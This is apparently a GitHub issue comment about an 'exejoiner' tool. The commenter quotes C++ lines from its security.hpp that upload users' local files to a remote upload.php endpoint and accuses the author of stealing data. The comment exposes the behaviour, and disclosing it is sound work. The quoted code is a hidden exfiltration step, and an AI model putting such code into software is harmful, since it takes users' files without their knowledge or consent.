Why in [security.hpp](https://github.com/0x44F/exejoiner/blob/main/includes/security.hpp#L46-L48) is sending local files to your remote webserver? Why are you stealing other peoples data. > auto response = cpr::Post(cpr::Url{"https://www.exejoiner.com/api/upload.php"}, > cpr::Multipart{{"file", cpr::Buffer{buffer, file_size}, input_files[i]}}); > delete[] buffer;
Why in security.hpp is sending local files to your remote webserver? Why are you stealing other peoples data.